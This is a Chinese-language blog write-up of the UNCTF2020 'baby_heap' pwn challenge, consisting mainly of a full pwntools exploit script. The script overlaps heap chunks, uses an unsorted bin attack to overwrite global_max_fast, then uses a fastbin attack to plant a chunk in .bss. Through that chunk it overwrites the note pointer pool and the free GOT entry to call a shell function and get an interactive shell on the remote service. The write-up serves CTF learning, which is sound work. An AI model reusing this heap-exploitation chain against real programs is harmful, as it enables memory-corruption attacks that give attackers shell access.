MENU

Catalog

    UNCTF2020 Unsorted bin attack global_max_fast & fastbin attack bss chunk baby_heap

    November 24, 2020 • Read: 967 • Pwn

    这道题大家都很熟悉了,这次用的是修改global_max_fast来使用fastbin attack的方法、
    官方wp真的不太看得懂,可能还要学习一下IO_File leak相关知识。
    官方wp的好处在于,保护全开的时候也能使用,主要是PIE和GOT。所以还是有学习的必要的。
    话不多说,看代码吧

    # -*- coding: utf-8 -*-
    from pwn import *
    #r = process('./pwn')
    r = remote('node2.hackingfor.fun', 35743)
    elf = ELF('./pwn')
    context.log_level = "debug"
    
    def en(c):
        c = int(c, 16)
        return(c * c * c) % 33
    
    def add_note(size):
        r.sendlineafter(">> ", "1")
        r.sendlineafter("size?", str(size))
        r.sendlineafter("content?", "a")
    
    def delete_note(idx):
        r.sendlineafter(">> ", "2")
        r.sendlineafter("index ?", str(idx))
    
    def change_note(idx, content):
        r.sendlineafter(">> ", "4")
        r.sendlineafter("index ?", str(idx))
        r.sendafter("what is your new content ?", content)
    
    r.recvuntil("welcome to game+++++++\n")
    data = r.recvuntil("\n", drop=True).split(' ')
    free_list_addr = en(data[3]) * 0x1000 + en(data[2]) * 0x100 + en(data[1]) * 0x10 + en(data[0])
    print 'free_list_addr: ' + hex(free_list_addr)
    
    #malloc unsorted bin attack
    add_note(0x18) #0
    add_note(0x18) #1
    add_note(0x88) #2
    add_note(0x18) #3
    change_note(0, 'a' * 0x18 + '\xb1')
    delete_note(1)
    add_note(0x18) #1
    add_note(0x88) #4 == 2
    
    #malloc fastbin chunk
    add_note(0x18) #5
    add_note(0x18) #6
    add_note(0x68) #7
    add_note(0x18) #8
    change_note(5, 'a' * 0x18 + '\x91')
    delete_note(6)
    add_note(0x18) #6
    add_note(0x68) #9 == 7
    
    #unsorted bin attack(change global_max_fast)
    delete_note(2) #2
    change_note(4, p64(0) + p16(free_list_addr))
    add_note(0x88) #2
    
    #fastbin attack
    delete_note(7) #7
    #UAF => BSS Chunk
    change_note(9, p64(0x6020C0 - 0x13)) #BSS chunk
    add_note(0x68) #7
    add_note(0x68) #10 BSS Chunk
    size_payload = 'a' * 0x3 + p32(0x19) + p32(0x19) + p32(0x89) + p32(0x19) \
                   + p32(0x89) + p32(0x19) + p32(0x19) + p32(0x69) \
                   + p32(0x19) + p32(0x69) + p32(0xFFFF) + p32(0)
    change_note(10, size_payload) #change size
    change_note(10, size_payload + p64(0) * 2 * 7 + p64(elf.got['free'])) #change ptr_pool
    
    change_note(0, p64(0x40097F)) #change_free_got => shell
    #gdb.attach(r)
    delete_note(0) #getshell
    r.interactive()
    
    Archives QR Code
    QR Code for this page
    Tipping QR Code